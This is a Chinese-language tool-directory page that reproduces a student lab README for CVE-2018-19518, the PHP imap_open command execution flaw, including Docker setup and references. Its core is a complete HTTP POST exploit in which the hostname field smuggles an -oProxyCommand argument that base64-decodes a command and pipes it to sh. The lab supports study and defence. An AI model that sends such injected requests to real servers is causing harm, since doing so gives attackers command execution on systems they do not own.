Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-19518 — 一些关于 CVE-2018-19518 的工作 | Kitploit
工具/GitHubGitHub/ensimag-security/cve-2018-19518
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubensimag-security/cve-2018-19518

CVE-2018-19518

一些关于 CVE-2018-19518 的工作

查看仓库
17年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-19518

最后报告在此:https://gitlab.com/ensimag-security/CVE-2018-19518/-/jobs/artifacts/master/raw/rapport.pdf?job=PDF

用法

运行应用

root@kitploit:~
docker-compose up -d

Web 应用的正常使用示例。

  • imap : webmail.grenoble-inp.org
  • 用户 : [email protected]
  • 密码 : xxx

利用

使用 echo '1234567890'>/tmp/test0001。

root@kitploit:~
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222

检查

docker-compose exec app bash 然后读取文件 cat /tmp/test0001:

waf

  • https://github.com/theonemule/docker-waf

相关提交

  • https://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb

参考

  • https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
  • https://nvd.nist.gov/vuln/detail/CVE-2018-19518
  • https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb
下载工具